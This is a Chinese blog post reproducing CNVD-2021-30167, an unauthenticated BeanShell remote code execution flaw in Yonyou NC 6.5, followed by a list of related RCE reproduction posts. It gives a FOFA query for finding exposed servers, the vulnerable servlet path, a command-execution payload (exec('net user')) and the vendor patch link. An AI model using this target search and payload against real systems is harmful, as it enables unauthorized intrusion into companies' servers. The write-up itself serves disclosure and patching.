CNVD-2021-30167 用友NC命令执行漏洞复现
一、漏洞概述
2021年06月03日,用友官方发布了用友BeanShell远程代码执行漏洞的风险通告,漏洞编号为CNVD-2021-30167,漏洞等级:严重,漏洞评分:9.8。
用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。成功利用该漏洞的攻击者可以直接在目标机器上执行任意代码,并以用友NC软件的用户权限执行任意命令。
该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。
该漏洞利用复杂度低,攻击者无需用户交互及相关权限便可直接执行任意代码,危害度很高。
二、影响版本
NC6.5版本
三、漏洞复现
1、使用fofa进行搜索
语法:title='YONYOU NC'
2.URL访问测试接口
/servlet/~ic/bsh.servlet.BshServlet
3、任意代码执行
exec("net user");
4.修复方式
用友NC官方说明:该漏洞为第三方jar包漏洞导致,用友NC官方已于4月9日解决并验证,且已通过服务渠道推送了解决方案,授权用户可以访问下载链接进行下载。补丁下载地址:
http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19
CNVD-2021-30167 用友NC命令执行漏洞复现相关推荐
- 用友远程命令执行漏洞并提权
用友的命令执行漏洞,print hello 发现可以执行命令 , whami 和id 都查一波权限,发现是root,呵呵,权限这么大,很好搞啊 ps -ef|grep sshd 查一波 发现可以ssh ...
- CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议 本文仅为验证漏洞,在本地环境测试验证,无其它目的 漏洞编号: ...
- Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 kali docker
Shiro RememberMe 1.2.4 反序列化命令执行漏洞复现 漏洞环境搭建 漏洞复现 反弹shell 题外话1 题外话2 影响版本:Apache Shiro <= 1.2.4 漏洞产生 ...
- 华为路由器远程命令执行漏洞复现(CVE-2017-17215)
华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...
- PHPMailer远程命令执行漏洞复现
PHPMailer远程命令执行漏洞复现 一.漏洞简介 PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, ...
- FastJson1.2.24反序列化导致任意命令执行漏洞复现(CVE-2017-18349)
#FastJson1.2.24反序列化导致任意命令执行漏洞(CVE-2017-18349)# 一.漏洞简介 Pippo是一款基于Java的Web框架.FastjsonEngine是其中的一个JSON处 ...
- 【vulhub】Apereo CAS 4.1 反序列化命令执行漏洞复现
楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 特征: 1.网站根目录下有cas目录 2.如图所示,有apereo CAS图标 3.如 ...
- 开源堡垒机JumpServer远程命令执行漏洞复现
声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...
- Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析
Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...
最新文章
- 计算机的好处和坏处的英语作文,《电脑的好处和坏处》英语作文 80词以上 谢谢...
- 网站结构优化——不能忽视的优化重点
- 六种微服务架构的设计模式
- php 代码线程,php实现多线程代码
- VTK:图片之ImageSinusoidSource
- [渝粤教育] 天津现代职业技术学院 餐饮服务实务(翁莉) 参考 资料
- vue路由的钩子函数有哪些?都做了哪些事情?
- 如何在关闭窗口的时候,不让浏览器自动弹出确认关闭对话框
- Oracle 查看索引语句
- 进击的django【第一集】
- ES6的类Class基础知识点
- linux块设备驱动简述(Linux驱动开发篇)
- es中的keyword相关功能
- Android将数据导出为excel文件的方法
- Windows11台式机连接Type-C触摸屏显示器
- 免费打造自己的个人网站,免费域名、免费空间、FTP、数据库什么的,一个不能少,没钱,也可以这么任性...
- Prometheus配置企业微信报警
- prometheus告警功能
- 会员营销如何提升企业与会员之间的互动频率
- IE浏览器下载文本文件(txt,csv等)
热门文章
- mysql的终端窗口是什么意思_MySQL之终端Terminal(dos界面)管理数据库、数据表、数据的基本操作...
- 程序员们注意了,警惕JS代码复制陷阱
- matlab 分母有理化,第5章频率特性精讲.ppt
- CesiumforUnrealQuickstart_译
- 中文纠错——CRF+N-grams
- Python练习(二)
- 好领导,六字诀“先之、劳之、无倦”,出自《论语》子路问政。子曰:“先之劳之。”请益,曰:“无倦。”
- linux C time
- MongoDB的安装到使用 + Python操作MongoDB + 有关系和无关系数据库比较
- 机器学习性能指标精确率、召回率、F1值、ROC、PRC与AUC